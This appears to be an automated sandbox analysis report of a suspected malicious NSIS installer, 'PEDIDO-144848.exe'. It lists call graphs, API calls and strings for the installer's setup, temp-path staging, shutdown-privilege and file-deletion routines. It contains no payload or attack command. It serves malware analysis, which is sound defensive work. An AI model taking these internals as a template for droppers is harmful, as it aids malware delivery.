5146->5147 5147->5148 5149 405aba WriteFile 5148->5149 5150 4025d2 5148->5150 5149->5150 5151 402c13 5152 402c22 SetTimer 5151->5152 5154 402c3b 5151->5154 5152->5154 5153 402c90 5154->5153 5155 402c55 MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 5154->5155 5155->5153 5156 404714 5157 404740 5156->5157 5158 404724 5156->5158 5160 404773 5157->5160 5161 404746 SHGetPathFromIDListA 5157->5161 5167 40557a GetDlgItemTextA 5158->5167 5163 404756 5161->5163 5166 40475d SendMessageA 5161->5166 5162 404731 SendMessageA 5162->5157 5164 40140b 2 API calls 5163->5164 5164->5166 5166->5160 5167->5162 4305 401d95 GetDC 4306 402aac 18 API calls 4305->4306 4307 401da7 GetDeviceCaps MulDiv ReleaseDC 4306->4307 4308 402aac 18 API calls 4307->4308 4309 401dd8 4308->4309 4310 405dc2 18 API calls 4309->4310 4311 401e15 CreateFontIndirectA 4310->4311 4312 40258a 4311->4312 4313 402695 4314 40269c 4313->4314 4316 40290b 4313->4316 4315 402aac 18 API calls 4314->4315 4317 4026a3 4315->4317 4318 4026b2 SetFilePointer 4317->4318 4318->4316 4319 4026c2 4318->4319 4321 405cfe wsprintfA 4319->4321 4321->4316 5168 10001058 5170 10001074 5168->5170 5169 100010dc 5170->5169 5171 10001091 5170->5171 5172 100014bb GlobalFree 5170->5172 5173 100014bb GlobalFree 5171->5173 5172->5171 5174 100010a1 5173->5174 5175 100010b1 5174->5175 5176 100010a8 GlobalSize 5174->5176 5177 100010b5 GlobalAlloc 5175->5177 5178 100010c6 5175->5178 5176->5175 5179 100014e2 3 API calls 5177->5179 5180 100010d1 GlobalFree 5178->5180 5179->5178 5180->5169 5181 404099 lstrcpynA lstrlenA 5182 401d1a 5183 402aac 18 API calls 5182->5183 5184 401d28 SetWindowLongA 5183->5184 5185 40295e 5184->5185 4432 40159d 4433 402ace 18 API calls 4432->4433 4434 4015a4 SetFileAttributesA 4433->4434 4435 4015b6 4434->4435 5191 40149d 5192 4014ab PostQuitMessage 5191->5192 5193 4022dd 5191->5193 5192->5193 4436 401a1e 4437 402ace 18 API calls 4436->4437 4438 401a27 ExpandEnvironmentStringsA 4437->4438 4439 401a3b 4438->4439 4441 401a4e 4438->4441 4440 401a40 lstrcmpA 4439->4440 4439->4441 4440->4441 4620 40171f 4621 402ace 18 API calls 4620->4621 4622 401726 SearchPathA 4621->4622 4623 401741 4622->4623 5194 100010e0 5203 1000110e 5194->5203 5195 100011c4 GlobalFree 5196 100012ad 2 API calls 5196->5203 5197 100011c3 5197->5195 5198 10001266 2 API calls 5201 100011b1 GlobalFree 5198->5201 5199 10001155 GlobalAlloc 5199->5203 5200 100011ea GlobalFree 5200->5203 5201->5203 5202 100012d1 lstrcpyA 5202->5203 5203->5195 5203->5196 5203->5197 5203->5198 5203->5199 5203->5200 5203->5201 5203->5202 5204 10002162 5205 100021c0 5204->5205 5206 100021f6 5204->5206 5205->5206 5207 100021d2 GlobalAlloc 5205->5207 5207->5205 5208 401e25 5209 402aac 18 API calls 5208->5209 5210 401e2b 5209->5210 5211 402aac 18 API calls 5210->5211 5212 401e37 5211->5212 5213 401e43 ShowWindow 5212->5213 5214 401e4e EnableWindow 5212->5214 5215 40295e 5213->5215 5214->5215 5216 401f2d 5217 402ace 18 API calls 5216->5217 5218 401f34 5217->5218 5219 4060a4 2 API calls 5218->5219 5220 401f3a 5219->5220 5222 401f4c 5220->5222 5223 405cfe wsprintfA 5220->5223 5223->5222 5224 404f2d 5225 404f51 5224->5225 5226 404f3d 5224->5226 5227 404f59 IsWindowVisible 5225->5227 5235 404f70 5225->5235 5228 404f43 5226->5228 5229 404f9a 5226->5229 5227->5229 5230 404f66 5227->5230 5232 403fd1 SendMessageA 5228->5232 5231 404f9f CallWindowProcA 5229->5231 5237 404884 SendMessageA 5230->5237 5234 404f4d 5231->5234 5232->5234 5235->5231 5242 404904 5235->5242 5238 4048e3 SendMessageA 5237->5238 5239 4048a7 GetMessagePos ScreenToClient SendMessageA 5237->5239 5241 4048db 5238->5241 5240 4048e0 5239->5240 5239->5241 5240->5238 5241->5235 5251 405da0 lstrcpynA 5242->5251 5244 404917 5252 405cfe wsprintfA 5244->5252 5246 404921 5247 40140b 2 API calls 5246->5247 5248 40492a 5247->5248 5253 405da0 lstrcpynA 5248->5253 5250 404931 5250->5229 5251->5244 5252->5246 5253->5250 5254 403ab2 5255 403c05 5254->5255 5256 403aca 5254->5256 5258 403c56 5255->5258 5259 403c16 GetDlgItem GetDlgItem 5255->5259 5256->5255 5257 403ad6 5256->5257 5260 403ae1 SetWindowPos 5257->5260 5261 403af4 5257->5261 5263 403cb0 5258->5263 5272 401389 2 API calls 5258->5272 5262 403f85 19 API calls 5259->5262 5260->5261 5265 403b11 5261->5265 5266 403af9 ShowWindow 5261->5266 5267 403c40 SetClassLongA 5262->5267 5264 403fd1 SendMessageA 5263->5264 5268 403c00 5263->5268 5294 403cc2 5264->5294 5269 403b33 5265->5269 5270 403b19 DestroyWindow 5265->5270 5266->5265 5271 40140b 2 API calls 5267->5271 5274 403b38 SetWindowLongA 5269->5274 5275 403b49 5269->5275 5273 403f0e 5270->5273 5271->5258 5276 403c88 5272->5276 5273->5268 5283 403f3f ShowWindow 5273->5283 5274->5268 5280 403bc0 5275->5280 5281 403b55 GetDlgItem 5275->5281 5276->5263 5277 403c8c SendMessageA 5276->5277 5277->5268 5278 40140b 2 API calls 5278->5294 5279 403f10 DestroyWindow EndDialog 5279->5273 5282 403fec 8 API calls 5280->5282 5284 403b85 5281->5284 5285 403b68 SendMessageA IsWindowEnabled 5281->5285 5282->5268 5283->5268 5287 403b92 5284->5287 5288 403bd9 SendMessageA 5284->5288 5289 403ba5 5284->5289 5297 403b8a 5284->5297 5285->5268 5285->5284 5286 405dc2 18 API calls 5286->5294 5287->5288 5287->5297 5288->5280 5292 403bc2 5289->5292 5293 403bad 5289->5293 5290 403f5e SendMessageA 5290->5280 5291 403f85 19 API calls 5291->5294 5296 40140b 2 API calls 5292->5296 5295 40140b 2 API calls 5293->5295 5294->5268 5294->5278 5294->5279 5294->5286 5294->5291 5298 403f85 19 API calls 5294->5298 5313 403e50 DestroyWindow 5294->5313 5295->5297 5296->5297 5297->5280 5297->5290 5299 403d3d GetDlgItem 5298->5299 5300 403d52 5299->5300 5301 403d5a ShowWindow EnableWindow 5299->5301 5300->5301 5322 403fa7 EnableWindow 5301->5322 5303 403d84 EnableWindow 5306 403d98 5303->5306 5304 403d9d GetSystemMenu EnableMenuItem SendMessageA 5305 403dcd SendMessageA 5304->5305 5304->5306 5305->5306 5306->5304 5323 403fba SendMessageA 5306->5323 5324 405da0 lstrcpynA 5306->5324 5309 403dfb lstrlenA 5310 405dc2 18 API calls 5309->5310 5311 403e0c SetWindowTextA 5310->5311 5312 401389 2 API calls 5311->5312 5312->5294 5313->5273 5314 403e6a CreateDialogParamA 5313->5314 5314->5273 5315 403e9d 5314->5315 5316 403f85 19 API calls 5315->5316 5317 403ea8 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 5316->5317 5318 401389 2 API calls 5317->5318 5319 403eee 5318->5319 5319->5268 5320 403ef6 ShowWindow 5319->5320 5321 403fd1 SendMessageA 5320->5321 5321->5273 5322->5303 5323->5306 5324->5309 5325 401eb3 5326 402ace 18 API calls 5325->5326 5327 401eb9 5326->5327 5328 404fb9 25 API calls 5327->5328 5329 401ec3 5328->5329 5330 405531 2 API calls 5329->5330 5333 401ec9 5330->5333 5331 401f1f CloseHandle 5335 402729 5331->5335 5332 401ee8 WaitForSingleObject 5332->5333 5334 401ef6 GetExitCodeProcess 5332->5334 5333->5331 5333->5332 5333->5335 5336 406175 2 API calls 5333->5336 5337 401f11 5334->5337 5338 401f08 5334->5338 5336->5332 5337->5331 5340 405cfe wsprintfA 5338->5340 5340->5337 4327 402336 4328 402ace 18 API calls 4327->4328 4329 402347 4328->4329 4330 402ace 18 API calls 4329->4330 4331 402350 4330->4331 4332 402ace 18 API calls 4331->4332 4333 40235a GetPrivateProfileStringA 4332->4333 5341 404936 GetDlgItem GetDlgItem 5342 404988 7 API calls 5341->5342 5348 404ba0 5341->5348 5343 404a2b DeleteObject 5342->5343 5344 404a1e SendMessageA 5342->5344 5345 404a34 5343->5345 5344->5343 5346 404a6b 5345->5346 5347 405dc2 18 API calls 5345->5347 5349 403f85 19 API calls 5346->5349 5351 404a4d SendMessageA SendMessageA 5347->5351 5355 404c84 5348->5355 5358 404884 5 API calls 5348->5358 5378 404c11 5348->5378 5354 404a7f 5349->5354 5350 404d30 5352 404d42 5350->5352 5353 404d3a SendMessageA 5350->5353 5351->5345 5362 404d54 ImageList_Destroy 5352->5362 5363 404d5b 5352->5363 5373 404d6b 5352->5373 5353->5352 5359 403f85 19 API calls 5354->5359 5355->5350 5360 404cdd SendMessageA 5355->5360 5384 404b93 5355->5384 5356 403fec 8 API calls 5361 404f26 5356->5361 5357 404c76 SendMessageA 5357->5355 5358->5378 5379 404a8d 5359->5379 5364 404cf2 SendMessageA 5360->5364 5360->5384 5362->5363 5366 404d64 GlobalFree 5363->5366 5363->5373 5368 404d05 5364->5368 5365 404eda 5369 404eec ShowWindow GetDlgItem ShowWindow 5365->5369 5365->5384 5366->5373 5367 404b61 GetWindowLongA SetWindowLongA 5370 404b7a 5367->5370 5374 404d16 SendMessageA 5368->5374 5369->5384 5371 404b80 ShowWindow 5370->5371 5372 404b98 5370->5372 5392 403fba SendMessageA 5371->5392 5393 403fba SendMessageA 5372->5393 5373->5365 5383 404904 4 API calls 5373->5383 5388 404da6 5373->5388 5374->5350 5375 404b5b 5375->5367 5375->5370 5378->5355 5378->5357 5379->5367 5379->5375 5380 404adc SendMessageA 5379->5380 5381 404b18 SendMessageA 5379->5381 5382 404b29 SendMessageA 5379->5382 5380->5379 5381->5379 5382->5379 5383->5388 5384->5356 5385 404eb0 InvalidateRect 5385->5365 5386 404ec6 5385->5386 5389 40483f 21 API calls 5386->5389 5387 404dd4 SendMessageA 5391 404dea 5387->5391 5388->5387 5388->5391 5389->5365 5390 404e5e SendMessageA SendMessageA 5390->5391 5391->5385 5391->5390 5392->5384 5393->5348 5394 4014b7 5395 4014bd 5394->5395 5396 401389 2 API calls 5395->5396 5397 4014c5 5396->5397 5398 401b39 5399 402ace 18 API calls 5398->5399 5400 401b40 5399->5400 5401 402aac 18 API calls 5400->5401 5402 401b49 wsprintfA 5401->5402 5403 40295e 5402->5403 5404 402939 SendMessageA 5405 402953 InvalidateRect 5404->5405 5406 40295e 5404->5406 5405->5406 4409 4015bb 4410 402ace 18 API calls 4409->4410 4411 4015c2 4410->4411 4412 4058ab 4 API calls 4411->4412 4425 4015ca 4412->4425 4413 401624 4415 401629 4413->4415 4417 401652 4413->4417 4414 40583d CharNextA 4414->4425 4428 401423 4415->4428 4419 401423 25 API calls 4417->4419 4424 40164a 4419->4424 4421 4054fc 2 API calls 4421->4425 4422 405519 5 API calls 4422->4425 4423 40163b SetCurrentDirectoryA 4423->4424 4425->4413 4425->4414 4425->4421 4425->4422 4426 40160c GetFileAttributesA 4425->4426 4427 40547f 4 API calls 4425->4427 4426->4425 4427->4425 4429 404fb9 25 API calls 4428->4429 4430 401431 4429->4430 4431 405da0 lstrcpynA 4430->4431 4431->4423 5407 4016bb 5408 402ace 18 API calls 5407->5408 5409 4016c1 GetFullPathNameA 5408->5409 5410 4016d8 5409->5410 5416 4016f9 5409->5416 5413 4060a4 2 API calls 5410->5413 5410->5416 5411 40170d GetShortPathNameA 5412 40295e 5411->5412 5414 4016e9 5413->5414 5414->5416 5417 405da0 lstrcpynA 5414->5417 5416->5411 5416->5412 5417->5416 5418 401d3b GetDlgItem GetClientRect 5419 402ace 18 API calls 5418->5419 5420 401d6b LoadImageA SendMessageA 5419->5420 5421 401d89 DeleteObject 5420->5421 5422 40295e 5420->5422 5421->5422

                                                        Executed Functions

                                                        Function 00403180 Relevance: 91.4, APIs: 33, Strings: 19, Instructions: 357stringcomfileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 403180-4031b5 SetErrorMode GetVersion 1 4031b7-4031bf call 406139 0->1 2 4031c8 0->2 1->2 7 4031c1 1->7 4 4031cd-4031e0 call 4060cb lstrlenA 2->4 9 4031e2-403255 call 406139 * 2 #17 OleInitialize SHGetFileInfoA call 405da0 GetCommandLineA call 405da0 GetModuleHandleA 4->9 7->2 18 403261-403276 call 40583d CharNextA 9->18 19 403257-40325c 9->19 22 40333b-40333f 18->22 19->18 23 403345 22->23 24 40327b-40327e 22->24 27 403358-403372 GetTempPathA call 40314f 23->27 25 403280-403284 24->25 26 403286-40328e 24->26 25->25 25->26 28 403290-403291 26->28 29 403296-403299 26->29 34 403374-403392 GetWindowsDirectoryA lstrcatA call 40314f 27->34 35 4033ca-4033e4 DeleteFileA call 402cfa 27->35 28->29 31 40332b-403338 call 40583d 29->31 32 40329f-4032a3 29->32 31->22 51 40333a 31->51 37 4032a5-4032ab 32->37 38 4032bb-4032e8 32->38 34->35 52 403394-4033c4 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 40314f 34->52 53 403478-403488 call 403646 OleUninitialize 35->53 54 4033ea-4033f0 35->54 44 4032b1 37->44 45 4032ad-4032af 37->45 40 4032ea-4032f0 38->40 41 4032fb-403329 38->41 47 4032f2-4032f4 40->47 48 4032f6 40->48 41->31 49 403347-403353 call 405da0 41->49 44->38 45->38 45->44 47->41 47->48 48->41 49->27 51->22 52->35 52->53 66 4035ac-4035b2 53->66 67 40348e-40349e call 405596 ExitProcess 53->67 57 4033f2-4033fd call 40583d 54->57 58 403468-40346f call 403720 54->58 71 403433-40343d 57->71 72 4033ff-403428 57->72 64 403474 58->64 64->53 69 4035b4-4035cd GetCurrentProcess OpenProcessToken 66->69 70 40362e-403636 66->70 78 4035ff-40360d call 406139 69->78 79 4035cf-4035f9 LookupPrivilegeValueA AdjustTokenPrivileges 69->79 73 403638 70->73 74 40363c-403640 ExitProcess 70->74 76 4034a4-4034b8 call 405519 lstrcatA 71->76 77 40343f-40344c call 405900 71->77 80 40342a-40342c 72->80 73->74 89 4034c5-4034df lstrcatA lstrcmpiA 76->89 90 4034ba-4034c0 lstrcatA 76->90 77->53 88 40344e-403464 call 405da0 * 2 77->88 91 40361b-403625 ExitWindowsEx 78->91 92 40360f-403619 78->92 79->78 80->71 84 40342e-403431 80->84 84->71 84->80 88->58 89->53 94 4034e1-4034e4 89->94 90->89 91->70 95 403627-403629 call 40140b 91->95 92->91 92->95 97 4034e6-4034eb call 40547f 94->97 98 4034ed call 4054fc 94->98 95->70 106 4034f2-4034ff SetCurrentDirectoryA 97->106 98->106 107 403501-403507 call 405da0 106->107 108 40350c-403534 call 405da0 106->108 107->108 112 40353a-403556 call 405dc2 DeleteFileA 108->112 115 403597-40359e 112->115 116 403558-403568 CopyFileA 112->116 115->112 117 4035a0-4035a7 call 405c5b 115->117 116->115 118 40356a-40358a call 405c5b call 405dc2 call 405531 116->118 117->53 118->115 127 40358c-403593 CloseHandle 118->127 127->115
                                                        APIs
                                                        • SetErrorMode.KERNELBASE ref: 004031A5
                                                        • GetVersion.KERNEL32 ref: 004031AB
                                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004031D4
                                                        • #17.COMCTL32(00000007,00000009), ref: 004031F6
                                                        • OleInitialize.OLE32(00000000), ref: 004031FD
                                                        • SHGetFileInfoA.SHELL32(0079D500,00000000,?,00000160,00000000), ref: 00403219
                                                        • GetCommandLineA.KERNEL32(Rse Setup,NSIS Error), ref: 0040322E
                                                        • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\PEDIDO-144848.exe",00000000), ref: 00403241
                                                        • CharNextA.USER32(00000000,"C:\Users\user\Desktop\PEDIDO-144848.exe",00000020), ref: 0040326C
                                                        • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403369
                                                        • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040337A
                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403386
                                                        • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040339A
                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004033A2
                                                        • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004033B3
                                                        • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004033BB
                                                        • DeleteFileA.KERNELBASE(1033), ref: 004033CF
                                                          • Part of subcall function 00406139: GetModuleHandleA.KERNEL32(?,?,?,004031EA,00000009), ref: 0040614B
                                                          • Part of subcall function 00406139: GetProcAddress.KERNEL32(00000000,?), ref: 00406166
                                                        • OleUninitialize.OLE32(?), ref: 0040347D
                                                        • ExitProcess.KERNEL32 ref: 0040349E
                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 004035BB
                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 004035C2
                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004035DA
                                                        • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004035F9
                                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 0040361D
                                                        • ExitProcess.KERNEL32 ref: 00403640
                                                          • Part of subcall function 00405596: MessageBoxIndirectA.USER32(00409218), ref: 004055F1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
                                                        • String ID: "$"C:\Users\user\Desktop\PEDIDO-144848.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\PEDIDO-144848.exe$C:\Users\user\slavelivets$C:\Users\user\slavelivets$Error launching installer$Low$NSIS Error$Rse Setup$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                        • API String ID: 3329125770-934152838
                                                        • Opcode ID: bbf1fb5b53fc7b28b57eed0d95e8f77975159f1cadf5f6a8baec224272584505
                                                        • Instruction ID: 9be49b359e088d3119d2258a489a24960a077000951b0681bd3593dcca7d42e2
                                                        • Opcode Fuzzy Hash: bbf1fb5b53fc7b28b57eed0d95e8f77975159f1cadf5f6a8baec224272584505
                                                        • Instruction Fuzzy Hash: 03C107706086816EE7116F719D4DA2F3EACAF86306F44457FF482B52E2C77C4A058B2E
                                                        Function 00405DC2 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 199stringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 269 405dc2-405dcd 270 405de0-405df5 269->270 271 405dcf-405dde 269->271 272 405fe8-405fec 270->272 273 405dfb-405e06 270->273 271->270 274 405ff2-405ffc 272->274 275 405e18-405e22 272->275 273->272 276 405e0c-405e13 273->276 277 406007-406008 274->277 278 405ffe-406002 call 405da0 274->278 275->274 279 405e28-405e2f 275->279 276->272 278->277 281 405e35-405e6a 279->281 282 405fdb 279->282 283 405e70-405e7b GetVersion 281->283 284 405f85-405f88 281->284 285 405fe5-405fe7 282->285 286 405fdd-405fe3 282->286 287 405e95 283->287 288 405e7d-405e81 283->288 289 405fb8-405fbb 284->289 290 405f8a-405f8d 284->290 285->272 286->272 294 405e9c-405ea3 287->294 288->287 291 405e83-405e87 288->291 295 405fc9-405fd9 lstrlenA 289->295 296 405fbd-405fc4 call 405dc2 289->296 292 405f9d-405fa9 call 405da0 290->292 293 405f8f-405f9b call 405cfe 290->293 291->287 297 405e89-405e8d 291->297 307 405fae-405fb4 292->307 293->307 299 405ea5-405ea7 294->299 300 405ea8-405eaa 294->300 295->272 296->295 297->287 303 405e8f-405e93 297->303 299->300 305 405ee3-405ee6 300->305 306 405eac-405ec7 call 405c87 300->306 303->294 308 405ef6-405ef9 305->308 309 405ee8-405ef4 GetSystemDirectoryA 305->309 315 405ecc-405ecf 306->315 307->295 311 405fb6 307->311 313 405f63-405f65 308->313 314 405efb-405f09 GetWindowsDirectoryA 308->314 312 405f67-405f6a 309->312 316 405f7d-405f83 call 40600b 311->316 312->316 320 405f6c-405f70 312->320 313->312 318 405f0b-405f15 313->318 314->313 319 405ed5-405ede call 405dc2 315->319 315->320 316->295 322 405f17-405f1a 318->322 323 405f2f-405f45 SHGetSpecialFolderLocation 318->323 319->312 320->316 325 405f72-405f78 lstrcatA 320->325 322->323 326 405f1c-405f23 322->326 327 405f60 323->327 328 405f47-405f5e SHGetPathFromIDListA CoTaskMemFree 323->328 325->316 330 405f2b-405f2d 326->330 327->313 328->312 328->327 330->312 330->323
                                                        APIs
                                                        • GetVersion.KERNEL32(00000006,0079DD20,00000000,00404FF1,0079DD20,00000000), ref: 00405E73
                                                        • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00405EEE
                                                        • GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405F01
                                                        • SHGetSpecialFolderLocation.SHELL32(?,0078FCF8), ref: 00405F3D
                                                        • SHGetPathFromIDListA.SHELL32(0078FCF8,Call), ref: 00405F4B
                                                        • CoTaskMemFree.OLE32(0078FCF8), ref: 00405F56
                                                        • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405F78
                                                        • lstrlenA.KERNEL32(Call,00000006,0079DD20,00000000,00404FF1,0079DD20,00000000), ref: 00405FCA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                        • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                        • API String ID: 900638850-1230650788
                                                        • Opcode ID: 8aaebd9e83df3b37401bec0d629d687f6ba259a9d136d118ad02b0f801d1bc8a
                                                        • Instruction ID: 6cdfcc9d134e5fa542626d346f44b404821d9f3efcf53b1aa70e88c92b4f8a03
                                                        • Opcode Fuzzy Hash: 8aaebd9e83df3b37401bec0d629d687f6ba259a9d136d118ad02b0f801d1bc8a
                                                        • Instruction Fuzzy Hash: A4610271A04A06AEEB115B24CC84BBF3BA8EB56314F54813BE541BA2D0D37D4981DF4E
                                                        Function 00405642 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159filestringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 331 405642-405668 call 405900 334 405681-405688 331->334 335 40566a-40567c DeleteFileA 331->335 337 40568a-40568c 334->337 338 40569b-4056ab call 405da0 334->338 336 40580b-40580f 335->336 339 405692-405695 337->339 340 4057b9-4057be 337->340 344 4056ba-4056bb call 405859 338->344 345 4056ad-4056b8 lstrcatA 338->345 339->338 339->340 340->336 343 4057c0-4057c3 340->343 346 4057c5-4057cb 343->346 347 4057cd-4057d5 call 4060a4 343->347 349 4056c0-4056c3 344->349 345->349 346->336 347->336 354 4057d7-4057eb call 405812 call 4055fa 347->354 352 4056c5-4056cc 349->352 353 4056ce-4056d4 lstrcatA 349->353 352->353 355 4056d9-4056f7 lstrlenA FindFirstFileA 352->355 353->355 370 405803-405806 call 404fb9 354->370 371 4057ed-4057f0 354->371 357 4056fd-405714 call 40583d 355->357 358 4057af-4057b3 355->358 364 405716-40571a 357->364 365 40571f-405722 357->365 358->340 360 4057b5 358->360 360->340 364->365 367 40571c 364->367 368 405724-405729 365->368 369 405735-405743 call 405da0 365->369 367->365 372 40572b-40572d 368->372 373 40578e-4057a0 FindNextFileA 368->373 381 405745-40574d 369->381 382 40575a-405765 call 4055fa 369->382 370->336 371->346 375 4057f2-405801 call 404fb9 call 405c5b 371->375 372->369 377 40572f-405733 372->377 373->357 379 4057a6-4057a9 FindClose 373->379 375->336 377->369 377->373 379->358 381->373 384 40574f-405758 call 405642 381->384 390 405786-405789 call 404fb9 382->390 391 405767-40576a 382->391 384->373 390->373 393 40576c-40577c call 404fb9 call 405c5b 391->393 394 40577e-405784 391->394 393->373 394->373
                                                        APIs
                                                        • DeleteFileA.KERNELBASE(?,?,758B3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040566B
                                                        • lstrcatA.KERNEL32(0079F548,\*.*,0079F548,?,?,758B3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004056B3
                                                        • lstrcatA.KERNEL32(?,00409014,?,0079F548,?,?,758B3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004056D4
                                                        • lstrlenA.KERNEL32(?,?,00409014,?,0079F548,?,?,758B3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004056DA
                                                        • FindFirstFileA.KERNEL32(0079F548,?,?,?,00409014,?,0079F548,?,?,758B3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004056EB
                                                        • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405798
                                                        • FindClose.KERNEL32(00000000), ref: 004057A9
                                                        Strings
                                                        • "C:\Users\user\Desktop\PEDIDO-144848.exe", xrefs: 00405642
                                                        • \*.*, xrefs: 004056AD
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 0040564F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
